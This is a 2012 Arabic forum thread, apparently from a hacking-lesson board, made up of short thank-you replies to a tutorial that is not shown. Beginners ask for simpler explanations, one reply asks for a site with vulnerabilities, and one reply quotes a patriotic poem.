03-16-2012, 05:27 AM
جزاك الله الف خير

zawi virus
03-19-2012, 03:21 AM
مازال هذا مرح نفهم منه نحن المبتدئين نبو ابسط من هيك

BAKIR
03-22-2012, 02:12 AM
جزاك الله الف خير

Dr ZERO
03-24-2012, 05:36 PM
مشكووووووووووووووووور

white-hacker
03-29-2012, 12:50 PM
شكرا ..جزاك الله خيرا

amroadel
04-06-2012, 02:43 PM
ممكن احد يعطنى موقع فيه الثغرات

السميم
04-06-2012, 06:06 PM
يعطيك الف عافيه

Amaady
04-12-2012, 11:28 AM
شكرا على الشرح المتميز ...

جزاك الله خير يا مبدع .. و إلى الأمام

house21
04-16-2012, 02:21 AM
جزاك الله خيرا

سجل

أنا عربي

أنا اسم بلا لقبِ

صبورٌ في بلادٍ كلُّ ما فيها

يعيشُ بفورةِ الغضبِ

جذوري...

قبلَ ميلادِ الزمانِ رستْ

وقبلَ تفتّحِ الحقبِ

وقبلَ السّروِ والزيتونِ

.. وقبلَ ترعرعِ العشبِ

أبي.. من أسرةِ المحراثِ

لا من سادةٍ نجبِ

وجدّي كانَ فلاحاً

بلا حسبٍ.. ولا نسبِ!

يعلّمني شموخَ الشمسِ قبلَ قراءةِ الكتبِ

وبيتي كوخُ ناطورٍ

منَ الأعوادِ والقصبِ

فهل ترضيكَ منزلتي؟

أنا اسم بلا لقبِ

سجل

أنا عربي

meh-hacker
04-17-2012, 03:23 PM
موضوووووووووووووووووووووو ع راااااائئئئئئئععععععععع

meh-hacker
04-17-2012, 03:24 PM
موضوووووووووووووووووووووو ع راااااائئئئئئئعععععععع

مازن عيساوي
04-17-2012, 04:40 PM
تسلم بارك الله فيك بس انا ما فهمت الى القليل لني جديد وابي افهم

ريــــوف
04-22-2012, 01:46 AM
شكرررررررررررررررررررا

hymoo hkrz
04-28-2012, 08:49 AM
مشكوووورررررررررررررررر

sssssss
04-28-2012, 10:39 PM
مر سي....1

نورالدين N
05-01-2012, 02:07 PM
thanxxxxxx

Thepunishar
05-02-2012, 04:13 AM
مشكور بس ما فهمت شي ....مع أني متابع درس درس من الأول

M.Bomb
05-02-2012, 07:56 PM
مشكوور جداً ...
على الجهود الرائعة

هواوي
05-03-2012, 05:53 PM
مشكووور اخوي ..
بس الروابط ما تفتح معاي ليه !!

bo.saad
06-09-2012, 12:52 AM
الله عليك شرح وافي يعطيك العافيه


والله فائدني كثير روعه ياستاذ استمر الله يوفقك